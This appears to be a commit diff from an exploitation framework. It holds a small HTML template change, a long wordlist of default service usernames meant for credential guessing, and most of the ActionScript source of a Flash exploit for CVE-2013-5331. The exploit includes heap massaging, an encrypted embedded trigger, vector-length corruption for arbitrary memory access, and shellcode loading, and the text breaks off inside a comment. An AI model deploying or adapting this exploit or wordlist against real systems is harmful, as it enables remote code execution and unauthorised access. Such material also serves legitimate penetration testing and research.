 	</style>
 
-	<script src="api.js"> </script>
 	<script>
+		=WEBRTCAPIJS=
+
 		var channel = '=CHANNEL=';
 		var websocket = new WebSocket('ws://=SERVER=');
 
@@ -136,10 +141,12 @@
 		};
 
 		window.onload = function() {
-			getUserMedia(function(stream) {
-				peer.addStream(stream);
-				peer.startBroadcasting();
-			});
+			setTimeout(function(){
+				getUserMedia(function(stream) {
+					peer.addStream(stream);
+					peer.startBroadcasting();
+				});
+			}, 500);
 		};
 
 		function getUserMedia(callback) {

data/wordlists/default_users_for_services_unhash.txt

@@ -0,0 +1,915 @@
+admin
+
+root
+Administrator
+sysadm
+tech
+operator
+guest
+security
+debug
+manager
+service
+!root
+user
+netman
+super
+diag
+Cisco
+Manager
+DTA
+apc
+User
+Admin
+cablecom
+adm
+wradmin
+netscreen
+sa
+setup
+cmaker
+enable
+MICRO
+login
+write
+monitor
+netopia
+op
+adminview
+sysadmin
+echo
+craft
+maint
+comcast
+CSG
+readonly
+manuf
+cusadmin
+smc
+sweex
+disttech
+su
+poll
+SYSDBA
+anonymous
+support
+recovery
+USERID
+eng
+administrator
+NETWORK
+JDE
+Guest
+rwa
+USER
+test
+lp
+ro
+MAIL
+ami
+hsa
+system
+MGR
+ADMINISTRATOR
+FIELD
+PBX
+HELLO
+hscroot
+1502
+superuser
+netrangr
+readwrite
+piranha
+wlse
+l3
+none
+naadmin
+public
+NETOP
+MANAGER
+demo
+D-Link
+l2
+rw
+cgadmin
+storwatch
+vcr
+OPERATOR
+MDaemon
+jagadmin
+enquiry
+at4400
+davox
+PFCUser
+aaa
+topicalt
+admin2
+1234
+nms
+client
+sys
+field
+deskman
+SYSADM
+superadmin
+pmd
+GEN2
+ADMN
+Factory
+PRODDTA
+tellabs
+spcl
+dadmin
+helpdesk
+dhs3mt
+install
+adfexc
+IntraSwitch
+manage
+superman
+SPOOLMAN
+ADVMAIL
+vt100
+PSEAdmin
+patrol
+teacher
+PCUSER
+Any
+RSBCMON
+cellit
+inads
+halt
+locate
+TMAR#HWMT8007079
+rapport
+xbox
+device
+NICONEX
+acc
+31994
+bcim
+websecadm
+blue
+topicnorm
+supervisor
+ccrusr
+266344
+telecom
+GEN1
+SSA
+HTTP
+mtch
+bciim
+browse
+hydrasna
+deskres
+bbsd-client
+replicator
+intel
+radware
+intermec
+mlusr
+init
+e250
+Polycom
+temp1
+mac
+3comcso
+RMUser1
+WP
+NAU
+rcust
+mtcl
+topicres
+bcnas
+adminuser
+Root
+cac_admin
+mediator
+Anonymous
+kermit
+volition
+GlobalAdmin
+LUCENT01
+LUCENT02
+adminstat
+desknorm
+IntraStack
+e500
+deskalt
+cust
+tiara
+bcms
+m1122
+telco
+xd
+dhs3pms
+VNC
+customer
+cisco
+adminstrator
+ftp_nmc
+me
+iclock
+scmadmin
+installer
+webadmin
+ftp_inst
+DDIC
+SYSTEM
+draytek
+EARLYWATCH
+super.super
+ftp_oper
+corecess
+weblogic
+system/manager
+End
+d.e.b.u.g
+target
+MD110
+tiger
+adminttd
+wlseuser
+SAPCPIC
+ftp_admi
+default.password
+7
+2
+ADMIN
+itsadmin
+PUBSUB
+CTXSYS
+ftp
+bill
+192.168.1.1
+setpriv
+GUEST
+SAP*
+t3admin
+hello
+CISCO15
+1.79
+mso
+Telecom
+qsysopr
+APPS
+Developer
+mail
+qsecofr
+11111
+Service
+netadmin
+any
+db2fenc1
+johnson
+isp
+demos
+QSRV
+MDSYS
+vpasp
+TEST
+QSECOFR
+1
+informix
+5
+engmode
+scout
+qpgmr
+ADSL
+images
+Gearguy
+Demo
+serial#
+BACKUP
+stratacom
+6.x
+mary
+COMPANY
+SYS
+DSL
+Jetform
+eagle
+ROUTER
+ods
+siteadmin
+Alphanetworks
+Admin1
+janta
+servlet
+username
+citel
+Replicator
+SYSMAN
+master
+SUPERUSER
+cn=orcladmin
+30
+maintainer
+BRIO_ADMIN
+internal
+CQSCHEMAUSER
+DEV2000_DEMOS
+FSFTASK1
+checkfs
+USER1
+SQLDBA
+HELP
+toor
+qsrvbas
+SYSADMIN
+EZsetup
+BATCH
+STRAT_USER
+primenet
+OEMREP
+USER6
+lynx
+powerdown
+$ALOC$
+password
+VOL-0215
+tomcat
+REP_MANAGER
+WinCCConnect
+ALLIN1
+DIRMAINT
+eqadmin
+QSRVBAS
+AQJAVA
+LASERWRITER
+PERFSTAT
+apcuser
+MBWATCH
+system_admin
+unix
+OWNER
+NETPRIV
+VSEMAINT
+DEMO
+SYMPA
+REP_OWNER
+DCL
+FAX
+ARCHIVIST
+VTAMUSER
+VMTAPE
+basisk
+NetLinx
+OutOfBox
+NETMGR
+DEFAULT
+OAS_PUBLIC
+read
+AP
+MTSSYS
+SYSMAINT
+AUDIOUSER
+Joe
+IDMS
+$SRV
+snake
+ROOT
+PRINTER
+shutdown
+satan
+RDM470
+trouble
+fax
+OP1
+admin@example.com
+HOST
+ADLDEMO
+QS_ADM
+bin
+OPER
+oracle
+jj
+PO7
+www
+joe
+MAINT
+CMSBATCH
+CCC
+role1
+DATAMOVE
+MSHOME
+ISPVM
+crowd­-openid-­server
+user_editor
+sedacm
+db2admin
+Airaya
+SYSDUMP1
+IMEDIA
+primos_cs
+USER_TEMPLATE
+pnadmin
+lpadmin
+VTAM
+TRACESVR
+POSTMASTER
+MAILER
+RSCSV2
+QS_WS
+circ
+nobody
+Tasman
+DISCOVERER_ADMIN
+VMASMON
+LR-ISDN
+TURBINE
+GL
+PO
+PRINT
+MODTEST
+GATEWAY
+PRIMARY
+both
+haasadm
+pw
+games
+DOCSIS_APP
+bbs
+EMP
+postmaster
+SITEMINDER
+vgnadmin
+RJE
+gonzo
+NEWS
+AQUSER
+UTLBSTATU
+netbotz
+xmi_demo
+ORACACHE
+MCUser
+prash
+sync
+PM
+AP2SVP
+ibm
+ULTIMATE
+SABRE
+user_pricer
+SUPERVISOR
+EVENT
+PORTAL30_SSO_PS
+FSFADMIN
+OO
+WKSYS
+OPERATNS
+UVPIM_
+OE
+OCITEST
+web
+ESSEX
+None
+CTXDEMO
+user_designer
+QDBA
+role
+LRISDN
+tele
+WEBCAL01
+rsadmin
+OMWB_EMULATION
+WINDOWS_PASSTHRU
+MOREAU
+fast
+host
+ORDPLUGINS
+SYSWRM
+savelogs
+SDOS_ICSAP
+DSSYS
+MGWUSER
+TDOS_ICSAP
+ssp
+EJSADMIN
+INGRES
+DS
+estheralastruey
+VCSRV
+ssladmin
+CLARK
+OEMADM
+restoreonly
+quser
+MILLER
+trmcnfg
+REPORT
+user_author
+dpn
+tour
+mountfsys
+http
+PROG
+openfiler
+RAID
+STARTER
+FAXUSER
+DSA
+daemon
+mountsys
+backuponly
+IVPM1
+USER3
+OPENSPIRIT
+prime
+HPLASER
+CSPUSER
+qsvr
+SYSCKP
+Sysop
+user_marketer
+IMAGEUSER
+bsxuser
+MASTER
+USER9
+OLAPSYS
+rje
+ODM_MTR
+QS_ES
+lansweeperuser
+DEMO3
+Username
+GPLD
+uucp
+DBSNMP
+VMARCH
+SWUSER
+Operator
+CHEY_ARCHSVR
+roo
+n.a
+accounting
+backuprestore
+dni
+WEBADM
+iceman
+guru
+anon
+USER8
+PORTAL30_SSO_PUBLIC
+postgres
+WINSABRE
+USERP
+IVPM2
+PORTAL30_SSO
+ALLIN1MAIL
+POST
+TEMP
+BATCH1
+PROMAIL
+SECDEMO
+ARAdmin
+sadmin
+ORAREGSYS
+VMASSYS
+man
+FROSTY
+LASER
+tutor
+DISKCNT
+default
+SYSERR
+WWW
+VAX
+PROCAL
+FAXWORKS
+LDAP_Anonymous
+(any
+setup/snmp
+DSGATEWAY
+AWARD_SW
+CSMIG
+umountfsys
+VMS
+bpel
+viewuser
+TDISK
+politically
+user_analyst
+RSCS
+COMPIERE
+OSP22
+guest1
+FORSE
+factory
+bubba
+QUSER
+primeos
+glftpd
+RMAN
+mountfs
+DIRECT
+firstsite
+IPFSERV
+TSUSER
+BATCH2
+snmp
+WebAdmin
+IBMUSER
+SMART
+voadmin
+BC4J
+core
+OPERVAX
+Bobo
+WANGTEK
+OWA
+USER2
+jasperadmin
+VMBSYSAD
+PVM
+ctb_admin
+ 
+DEMO4
+qsrv
+superdba
+PORTAL30
+XPRT
+Crowd
+18364
+ilom-admin
+rdc123
+sysopr
+tasman
+blank
+WEBREAD
+ODM
+11111111
+AURORA$ORB$UNAUTHENTICATED
+ADAMS
+Craft
+rfmngr
+SYSTEST_CLIG
+user_approver
+ilom-operator
+Nice-admin
+answer
+NETNONPRIV
+nuucp
+CIDS
+VASTEST
+redline
+MBMANAGER
+webmaster
+APPLSYS
+USER4
+hqadmin
+UOMNI_
+VMUTIL
+uucpadm
+EXFSYS
+4Dgifts
+JMUSER
+CIS
+UNITY_
+HLW
+pwrchute
+IDMSSE
+NSA
+TELEDEMO
+recover
+TRAVEL
+lexar
+viewer
+LIBRARY
+PO8
+root@localhost
+NAMES
+secofr
+PDMREMI
+MGE
+USER7
+OWA_PUBLIC
+questra
+builtin
+SFCNTRL
+boss
+PLEX
+OLAPDBA
+OLAPSVR
+user_expert
+Bhosda
+gropher
+TAHITI
+NEWINGRES
+VM3812
+VIF_DEVELOPER
+joeuser
+IPC
+HELPDESK
+wlpisystem
+TSAFVM
+prtgadmin
+UAMIS_
+theman
+CISINFO
+mobile
+QS_CB
+CDEMORID
+DEMO2
+PORTAL30_PUBLIC
+MDDEMO_CLERK
+PHANTOM
+ODS
+BLAKE
+TSDEV
+PRODBM
+dos
+APL2PP
+god1
+CICSUSER
+22222222
+user_publisher
+OSE$HTTP$ADMIN
+def
+SuperUser
+QS_CBADM
+SYSA
+STUDENT
+Draytek
+SMDR
+EREP
+VSEMAN
+fwadmin
+MTS_USER
+AQDEMO
+private
+IS_$hostname
+HPSupport
+ORASSO
+CVIEW
+SH
+XXSESS_MGRYY
+VMMAP
+PORTAL30_DEMO
+Ezsetup
+QS_CS
+CMSUSER
+DEMO1
+userNotUsed
+ncadmin
+TESTPILOT
+fg_sysadmin
+UETP
+QS
+DBI
+JWARD
+APPS_MRC
+Moe
+SENTINEL
+Yak
+PDP11
+Flo
+SLIDE
+INFO
+checkfsys
+PRODCICS
+MXAGENT
+VMTLIBR
+POWERCARTUSER
+VMBACKUP
+CPNUC
+distrib
+MIGRATE
+CDEMOUCB
+OLTSEP
+sysbin
+signa
+autocad
+WEBDB
+ncrm
+SAMPLE
+HCPARK
+ALLINONE
+nm2user
+SAVSYS
+IIPS
+PATROL
+mailadmin
+TMSADM
+ESubscriber
+software
+god2
+FSFTASK2
+ORDSYS
+gopher
+PSFMAINT
+EAdmin
+12345
+DECNET
+OPERATIONS
+$system
+PANAMA
+LIBRARIAN
+fal
+NETSERVER
+POWERCHUTE
+USER5
+GPFD
+QS_OS
+REPADMIN
+0
+DEMO8
+DEMO9
+CDEMO82
+umountsys
+USER0
+CDEMOCOR
+SYSTEST
+Rodopi
+user_checker
+qserv
+AQ
+SAPR3
+VRR1
+fastwire
+admi
+FINANCE
+WinCCAdmin
+ESTOREUSER
+VIRUSER
+LINK
+APPLSYSPUB
+overseer
+checksys
+umountfs
+DBDCCICS
+TOAD
+ntpupdate
+MDDEMO_MGR
+billy-bob
+DECMAIL
+alien
+nsroot
+AdvWebadmin
+dvstation
+SERVICECONSUMER1
+MMO2
+NOC
+WWWUSER
+SAP
+NEVIEW
+ODSCOMMON
+pixadmin
+ripeop
+PENG
+netlink
+L2LDEMO
+OUTLN
+12.x
+scott
+dbase
+fam
+Oper
+RMAIL
+FND
+PRIV
+SETUP
+news
+VSEIPO
+ilon
+PLSQL
+politcally
+18140815
+APPUSER
+CENTRA
+LBACSYS
+PDP8
+SFCMI
+lpadm
+Test
+bewan
+DIP
+mfd
+MDDEMO
+SWPRO
+DES
+Coco
+GCS
+rodopi
+Scott
+Admin5
+ANDY
+DESQUETOP
+NETCON
+JONES
+author
+MOESERV
+PUBSUB1
+CATALOG
+SQLUSER
+RE
+REPORTS_USER
+MFG
+HR
+VIDEOUSER
+DBA
+AUTOLOG1
+AURORA$JIS$UTILITY$
+wlcsystem
+CPRM

external/source/exploits/CVE-2013-5331/Exploit.as

@@ -0,0 +1,897 @@
+//Compile:  mxmlc.exe Exploit.as -o Exploit.swf
+
+package
+{
+	import flash.display.Sprite;
+	import flash.utils.ByteArray;
+	import flash.net.LocalConnection;
+	import flash.utils.Endian;
+	import flash.net.FileReference;
+	import __AS3__.vec.Vector;
+	import flash.system.Capabilities;
+	import flash.display.Loader;
+	import flash.utils.setTimeout;
+	
+	import flash.display.LoaderInfo;
+			
+	public class Exploit extends Sprite
+	{
+		var number_massage_vectors:uint = 0x18000;		
+		var len_massage_vector:uint = 0x36;		
+		var maxElementsPerPage:uint = 0xe00012;		
+		var massage_array:Array;		
+		var tweaked_vector;
+		var tweaked_vector_address;	
+		var done:Boolean = false;		
+		var receiver:LocalConnection;	
+		// Embedded trigger, ActionScript source available at the end of this file as code comment.		
+		var trigger_swf:String = "78da75565f4c9357144ff6b2cca7252ed91e966d2e2c35e0a605bc681d9f11a94f4b85745b05b2f0325c78d3651ad0173666d8941998a2d9f857a0aed8de425b4a59a1a520855908f4cf6de1d2967e03d9a2885127713a37d8b9f7fba0b0cc872fdc9eef777ee79cdf39dfb9343c2b0bf75c43d48cb36a08de5f41f07bb3e4b682128c1a435abf62b93b3f49f0a027fc15ea27e3c52ebd0fb9fbc5230e7b14fdd84f4b5c1db775d88e0b6c5e8abcce91125a3d52ea34f2df5a931e7f6ed3278a5d567f89c743cfba3a964a1d467f3eb5b5a0c1fea1bc25122872b8936a6a1f3a62b58bc864a7a57d7a5ce8edc5451686bb9cd4b9fbfdc7f0e5a1a2ee86d162ec4ca281c171d4e81e2a32b54ce699fa2327781c327ff4823159ea74b420b3939e6a68c067dbaa68becd33f122d5fbf35a2f2fa1ceb691bc3e63f4888724b58039eb218f0a1dee299d83dc2b7342dc2e27fea09d4ce69bc8bd7c13d466230b877b6d90437b5c6b3246510f19d675d68fe6f5da132c87f25e3bf09b71890be2eac944e160ad5c8b63a2a046aea7d7398c1cce1b857800170f905f8b06ec43a7fa3c37b403c6d1222799542f7947746ee74d84ddf7caee1251ebecc3fa0962406204231ae9449498b3a10fc26c40954de35d159a1016e25575fa3562c8146718a67b1da39c857e892166b3fcc7ef3af74b56b1334ed744b012fa898261ab3e460cca2bea2e148caf6dd30c612114c1e06746c0a58ca530d91c1304cc0a16c2525e7ba98c11c32c6617b3e5d0ad7e59dc2fbac6ce077d6a3312a3808d5bd2593e6233cbc750b6a8ee43416af6bf02be7497168904fb6904e68e983381ef8b45750f0a8a12f7ec7a3cc643d8b3099334fb19e6278659fe3f4c2d0ace5d47c104d7660f259da7d97b7191e5df0838c3011fcb57e4b9e7fad42e24ae6ee1c94d696ae69ade845e10625024898ca9572925fd0d399c2bb2c0b8d22edc673e1eae3dab2138c463bc7ddec7eced29fb18b7bf25d937eb34c8e3059a55efd0b843f9183410ef1864dd0dbb792cff6aa566060b237157fa28fbbdd1bb4ee89de15d5f93ea008d5bf75039d7e0d472868662616ca3be3a86dfe9535f871ed422da38688e9126c4e2fa78cdf674cd08e6feeee80b521fe23da7af32fe49f0abb675c7c8ab7ea845188bdc7c0edfb9ad7c707ed2a4ca84b330165065d108d444ee661c0ae11505e3fdc390c96b7bb89021d5e67d5e6dc0f19d90e0bc172b4699fd8141c17dff045f88f32ca07a5ffea6d013822b65db3e1ae9009ba9fce1b3e5375ca70e71bb3fc0f8be81f7b7f40962d81e9c9366e2ca14b39f17a6791c3dc46943c11593ac1f16462fd9d83cecdc9887fba93a57b9cfd71575c3ca6c3a8f19dfcb3cbf49ebe67385661a2b15e01bd9d0e56fa647b5426d84f71bb1784d639cf35bceffa079314d1dc2a729e359b1cadac3f9b17ce673743e5df25bd0cf810e945854ad5be3d42b980fd40b75e706a995eb31cdf5d00b11d003b8f6f998be49f85ef84c9d4bcdd4d3e56d0cbf1650e5d2788db0c2f793e14d9ec7eaea0ea9871ee8a143de1b96f5bd2148bd815e32ecc4ea0ebaeb1ae3cde1dccbedbbf9398ccb6baa273feab14f68cdffa476be62ae19701654d08a0fd2da89e23edb64316d8996e1b6d163de795cd2661d2ea0ec91ee844d7781a8c575f327a8c39fd7d8b2847ea85ad3e2ea645167c390ceabe73d423c9ff042dab8a60b6d27f20e851a673f69473484f70e13aca3640afd4554aad4aee8cc8e7f39a04f92ce9c6048de05c18533a5619c73959d09ef490edf8f33d652d0257316f634bccf0e80b689b061cfc7090c7bb8eb751a1e3ecaeebc6922ef04d0303e63a9bc2ae19487a759bc36fe5d49bba9bbe2f726952069db25506eb3f0fd31d7ccf613ef89f09b0ffb432cdf10cff9a5e971f80bf169eda3e32eeb2f3aaf537cadc1b40677ec8dc23b44bbef0ef42b46d2ced0182ef77a473e747937ddb183517667b347d29c24f2fb8c23796d1d7e761f9f6c6dc0851ee3dd932d70d75e70d2e32677e284c33ea1a69bb51866fbe1335e879cf3cfd304f209f6226ac7f0bfc745a411f1c6ac2542dd9f06d426a641b6bc0ff65e69cd8019b9b5b96fec9ce9eb87f99db140fdf03e3400b30d7d89bebd9fcd4cec29cee935c1fd4ddad7358459efce9c6dba25e12239592c5e94a47672bcf9fb4a4d5cdad9b1f5796896ef5ad8e571f62dc4eb77d04b90ebbffc1db134";
+		var key:uint = 3.627461843E9;
+		var shellcodeObj:Array;
+		
+		public function Exploit() {
+			var trigger_decrypted:uint = 0;
+			super();			
+			shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(",");			
+			var i:* = 0;
+			this.massage_array = new Array();
+			
+			// Memory massage 
+			i = 0;
+			while(i < this.number_massage_vectors)
+			{
+				this.massage_array[i] = new Vector.<int>(1);
+				i++;
+			}
+			i = 0;
+			while(i < this.number_massage_vectors)
+			{
+				this.massage_array[i] = new Vector.<int>(this.len_massage_vector);
+				this.massage_array[i][0] = 0x41414141;
+				i++;
+			}
+			var j:* = 0;
+			i = 0;
+			while(i < this.number_massage_vectors)
+			{
+				j = 0;
+				while(j < 32)
+				{
+					this.massage_array[i][j] = 0x41414141;
+					j++;
+				}
+				i++;
+			}
+			var k:uint = (4096 - 32) / (this.len_massage_vector * 4 + 8);
+			i = 65536 + 6;
+			while(i < this.number_massage_vectors)
+			{
+				this.massage_array[i] = new Vector.<int>(this.len_massage_vector * 2);
+				this.massage_array[i][0] = 0x42424242;
+				i = i + k;
+			}
+			
+			// Decompress/Decrypt trigger
+			this.receiver = new LocalConnection();
+			this.receiver.connect("toAS3");
+			this.receiver.client = this;
+			var trigger_byte_array:ByteArray = this.createByteArray(this.trigger_swf);
+			trigger_byte_array.endian = Endian.LITTLE_ENDIAN;
+			trigger_byte_array.uncompress();
+			trigger_byte_array.position = 0;
+			i = 0;
+			while(i < trigger_byte_array.length / 4)
+			{
+				trigger_decrypted = trigger_byte_array.readUnsignedInt() ^ this.key;
+				trigger_byte_array.position = trigger_byte_array.position - 4;
+				trigger_byte_array.writeUnsignedInt(trigger_decrypted);
+				i++;
+			}
+			trigger_byte_array.position = 0;
+			
+			// Trigger corruption
+			var trigger_loader:Loader = new Loader();
+			trigger_loader.loadBytes(trigger_byte_array);
+			
+			// Handler to check for corruption
+			setTimeout(this.as2loaded,4000,[]);
+		}
+		
+		function createByteArray(hex_string:String) : ByteArray {
+			var byte:String = null;
+			var byte_array:ByteArray = new ByteArray();
+			var hex_string_length:uint = hex_string.length;
+			var i:uint = 0;
+			while(i < hex_string_length)
+			{
+				byte = hex_string.charAt(i) + hex_string.charAt(i + 1);
+				byte_array.writeByte(parseInt(byte,16));
+				i = i + 2;
+			}
+			return byte_array;
+		}
+		
+		// When param1.length > 0 it's called from the corruption trigger
+		// Else it's called because of the timeout trigger
+		public function as2loaded(param1:Array) : * {
+			var back_offset:* = undefined; // backward offset from the tweaked vector
+			var j:* = undefined;
+			var _loc15_:uint = 0;
+			var ninbets:Array = null;
+			var array_with_code:Array = null;
+			var address_code:uint = 0;
+			var _loc19_:uint = 0;
+			if(this.done == true)
+			{
+				return;
+			}			
+			if(param1.length > 0)
+			{
+				this.done = true;
+			}			
+			var corrupted_index:uint = 0;
+			var i:* = 0;
+			i = 0x10000 + 6;
+			
+			// Search corrupted vector
+			while(i < this.number_massage_vectors)
+			{
+				if(this.massage_array[i].length != 2 * this.len_massage_vector)
+				{
+					if(this.massage_array[i].length != this.len_massage_vector)
+					{
+						corrupted_index = i;
+						this.massage_array[i][0] = 0x41424344;
+						break;
+					}
+				}
+				i++;
+			}
+			
+			// throw Error if any vector has been corrupted
+			if(i == this.number_massage_vectors)
+			{
+				throw new Error("not found");
+			}			
+			else // start the magic...
+			{
+				// Tweak the length for the vector next to the corrupted one
+				this.massage_array[corrupted_index][this.len_massage_vector] = 0x40000001; 
+				// Save the reference to the tweaked vector, it'll work with this one to leak and corrupt arbitrary memory
+				this.tweaked_vector = this.massage_array[corrupted_index + 1]; 
+				var offset_length = 0;
+				// Ensure tweaked vector length corruption, I guess the offset to the vector length
+				// changes between flash versions
+				if(this.tweaked_vector.length != 0x40000001)
+				{
+					this.massage_array[corrupted_index][this.len_massage_vector + 10] = 0x40000001;
+					offset_length = 10;
+				}				
+				if(param1.length > 0) // From the corruption trigger
+				{
+					// Fix the massage array of vectors, restores the corrupted vector and
+					// marks it as the last one.
+					back_offset = (4 * (this.len_massage_vector + 2) - 100) / 4 + this.len_massage_vector + 2; // 87
+					j = 0;
+					/*
+					tweaked_vector->prior->prior, some data is overwritten, is used for search purposes
+					tweaked_vector[3fffffa7] = 0
+					tweaked_vector[3fffffa8] = 0
+					tweaked_vector[3fffffa9] = 1c0340
+					tweaked_vector[3fffffaa] = ffffffff
+					tweaked_vector[3fffffab] = 0
+					tweaked_vector[3fffffac] = 0
+					tweaked_vector[3fffffad] = 0
+					tweaked_vector[3fffffae] = 0
+					tweaked_vector[3fffffaf] = 0
+					tweaked_vector[3fffffb0] = 0
+					tweaked_vector[3fffffb1] = 0
+					tweaked_vector[3fffffb2] = 100
+					tweaked_vector[3fffffb3] = 0
+					tweaked_vector[3fffffb4] = 0
+					tweaked_vector[3fffffb5] = 0
+					tweaked_vector[3fffffb6] = 0
+					tweaked_vector[3fffffb7] = 100dddce
+					tweaked_vector[3fffffb8] = 0
+					tweaked_vector[3fffffb9] = 1df6000
+					tweaked_vector[3fffffba] = 1dc2380
+					tweaked_vector[3fffffbb] = 0
+					tweaked_vector[3fffffbc] = 10000
+					tweaked_vector[3fffffbd] = 70
+					tweaked_vector[3fffffbe] = 0
+					tweaked_vector[3fffffbf] = 4
+					tweaked_vector[3fffffc0] = 0
+					tweaked_vector[3fffffc1] = 1de7090
+					tweaked_vector[3fffffc2] = 4
+					tweaked_vector[3fffffc3] = 0
+					tweaked_vector[3fffffc4] = 0
+					tweaked_vector[3fffffc5] = 0
+					// tweaked_vector->prior
+					tweaked_vector[3fffffc6] = 36 // Length
+					tweaked_vector[3fffffc7] = 1dea000
+					tweaked_vector[3fffffc8] = 41414141
+					tweaked_vector[3fffffc9] = 41414141
+					tweaked_vector[3fffffca] = 41414141
+					tweaked_vector[3fffffcb] = 41414141
+					tweaked_vector[3fffffcc] = 41414141
+					tweaked_vector[3fffffcd] = 41414141
+					tweaked_vector[3fffffce] = 41414141
+					tweaked_vector[3fffffcf] = 41414141
+					tweaked_vector[3fffffd0] = 41414141
+					tweaked_vector[3fffffd1] = 41414141
+					tweaked_vector[3fffffd2] = 41414141
+					tweaked_vector[3fffffd3] = 41414141
+					tweaked_vector[3fffffd4] = 41414141
+					tweaked_vector[3fffffd5] = 41414141
+					tweaked_vector[3fffffd6] = 41414141
+					tweaked_vector[3fffffd7] = 41414141
+					tweaked_vector[3fffffd8] = 41414141
+					tweaked_vector[3fffffd9] = 41414141
+					tweaked_vector[3fffffda] = 41414141
+					tweaked_vector[3fffffdb] = 41414141
+					tweaked_vector[3fffffdc] = 41414141
+					tweaked_vector[3fffffdd] = 41414141
+					tweaked_vector[3fffffde] = 41414141
+					tweaked_vector[3fffffdf] = 41414141
+					tweaked_vector[3fffffe0] = 41414141
+					tweaked_vector[3fffffe1] = 41414141
+					tweaked_vector[3fffffe2] = 41414141
+					tweaked_vector[3fffffe3] = 41414141
+					tweaked_vector[3fffffe4] = 41414141
+					tweaked_vector[3fffffe5] = 41414141
+					tweaked_vector[3fffffe6] = 41414141
+					tweaked_vector[3fffffe7] = 41414141
+					tweaked_vector[3fffffe8] = 0
+					tweaked_vector[3fffffe9] = 0
+					tweaked_vector[3fffffea] = 0
+					tweaked_vector[3fffffeb] = 0
+					tweaked_vector[3fffffec] = 0
+					tweaked_vector[3fffffed] = 0
+					tweaked_vector[3fffffee] = 0
+					tweaked_vector[3fffffef] = 0
+					tweaked_vector[3ffffff0] = 0
+					tweaked_vector[3ffffff1] = 0
+					tweaked_vector[3ffffff2] = 0
+					tweaked_vector[3ffffff3] = 0
+					tweaked_vector[3ffffff4] = 0
+					tweaked_vector[3ffffff5] = 0
+					tweaked_vector[3ffffff6] = 0
+					tweaked_vector[3ffffff7] = 0
+					tweaked_vector[3ffffff8] = 0
+					tweaked_vector[3ffffff9] = 0
+					tweaked_vector[3ffffffa] = 0
+					tweaked_vector[3ffffffb] = 0
+					tweaked_vector[3ffffffc] = 0
+					tweaked_vector[3ffffffd] = 0
+					*/
+					while(j < back_offset)
+					{
+						this.tweaked_vector[0x40000000 - back_offset - 2 + j - offset_length] = param1[j];
+						j++;
+					}
+					// tweaked_vector[3fffffff] = 1dea000 // Restores tweaked vector metadata
+					this.tweaked_vector[0x40000000-1] = param1[back_offset + 1];
+					
+					
+					j = back_offset + 2;
+					
+					// Modifies the tweaked vector content, and overflow the next ones, they just remain in good state:
+					/*
+					// tweaked vector content
+					tweaked_vector[0] = 41414141
+					tweaked_vector[1] = 41414141
+					tweaked_vector[2] = 41414141
+					tweaked_vector[3] = 41414141
+					tweaked_vector[4] = 41414141
+					tweaked_vector[5] = 41414141
+					tweaked_vector[6] = 41414141
+					tweaked_vector[7] = 41414141
+					tweaked_vector[8] = 41414141
+					tweaked_vector[9] = 41414141
+					tweaked_vector[a] = 41414141
+					tweaked_vector[b] = 41414141
+					tweaked_vector[c] = 41414141
+					tweaked_vector[d] = 41414141
+					tweaked_vector[e] = 41414141
+					tweaked_vector[f] = 41414141
+					tweaked_vector[10] = 41414141
+					tweaked_vector[11] = 41414141
+					tweaked_vector[12] = 41414141
+					tweaked_vector[13] = 41414141
+					tweaked_vector[14] = 41414141
+					tweaked_vector[15] = 41414141
+					tweaked_vector[16] = 41414141
+					tweaked_vector[17] = 41414141
+					tweaked_vector[18] = 41414141
+					tweaked_vector[19] = 41414141
+					tweaked_vector[1a] = 41414141
+					tweaked_vector[1b] = 41414141
+					tweaked_vector[1c] = 41414141
+					tweaked_vector[1d] = 41414141
+					tweaked_vector[1e] = 41414141
+					tweaked_vector[1f] = 41414141
+					tweaked_vector[20] = 0
+					tweaked_vector[21] = 0
+					tweaked_vector[22] = 0
+					tweaked_vector[23] = 0
+					tweaked_vector[24] = 0
+					tweaked_vector[25] = 0
+					tweaked_vector[26] = 0
+					tweaked_vector[27] = 0
+					tweaked_vector[28] = 0
+					tweaked_vector[29] = 0
+					tweaked_vector[2a] = 0
+					tweaked_vector[2b] = 0
+					tweaked_vector[2c] = 0
+					tweaked_vector[2d] = 0
+					tweaked_vector[2e] = 0
+					tweaked_vector[2f] = 0
+					tweaked_vector[30] = 0
+					tweaked_vector[31] = 0
+					tweaked_vector[32] = 0
+					tweaked_vector[33] = 0
+					tweaked_vector[34] = 0
+					tweaked_vector[35] = 0
+					// next to the tweaked vector
+					tweaked_vector[36] = 36
+					tweaked_vector[37] = 1dea000
+					tweaked_vector[38] = 41414141
+					tweaked_vector[39] = 41414141
+					tweaked_vector[3a] = 41414141
+					tweaked_vector[3b] = 41414141
+					tweaked_vector[3c] = 41414141
+					tweaked_vector[3d] = 41414141
+					tweaked_vector[3e] = 41414141
+					tweaked_vector[3f] = 41414141
+					tweaked_vector[40] = 41414141
+					tweaked_vector[41] = 41414141
+					tweaked_vector[42] = 41414141
+					tweaked_vector[43] = 41414141
+					tweaked_vector[44] = 41414141
+					tweaked_vector[45] = 41414141
+					tweaked_vector[46] = 41414141
+					tweaked_vector[47] = 41414141
+					tweaked_vector[48] = 41414141
+					tweaked_vector[49] = 41414141
+					tweaked_vector[4a] = 41414141
+					tweaked_vector[4b] = 41414141
+					tweaked_vector[4c] = 41414141
+					tweaked_vector[4d] = 41414141
+					tweaked_vector[4e] = 41414141
+					tweaked_vector[4f] = 41414141
+					tweaked_vector[50] = 41414141
+					tweaked_vector[51] = 41414141
+					tweaked_vector[52] = 41414141
+					tweaked_vector[53] = 41414141
+					tweaked_vector[54] = 41414141
+					tweaked_vector[55] = 41414141
+					tweaked_vector[56] = 41414141
+					tweaked_vector[57] = 41414141
+					tweaked_vector[58] = 0
+					tweaked_vector[59] = 0
+					tweaked_vector[5a] = 0
+					tweaked_vector[5b] = 0
+					tweaked_vector[5c] = 0
+					tweaked_vector[5d] = 0
+					tweaked_vector[5e] = 0
+					tweaked_vector[5f] = 0
+					tweaked_vector[60] = 0
+					tweaked_vector[61] = 0
+					tweaked_vector[62] = 0
+					tweaked_vector[63] = 0
+					tweaked_vector[64] = 0
+					tweaked_vector[65] = 0
+					tweaked_vector[66] = 0
+					tweaked_vector[67] = 0
+					tweaked_vector[68] = 0
+					tweaked_vector[69] = 0
+					tweaked_vector[6a] = 0
+					tweaked_vector[6b] = 0
+					tweaked_vector[6c] = 0
+					tweaked_vector[6d] = 0
+					// next -> next to the tweaked vector
+					tweaked_vector[6e] = 36
+					tweaked_vector[6f] = 1dea000
+					tweaked_vector[70] = 41414141
+					tweaked_vector[71] = 41414141
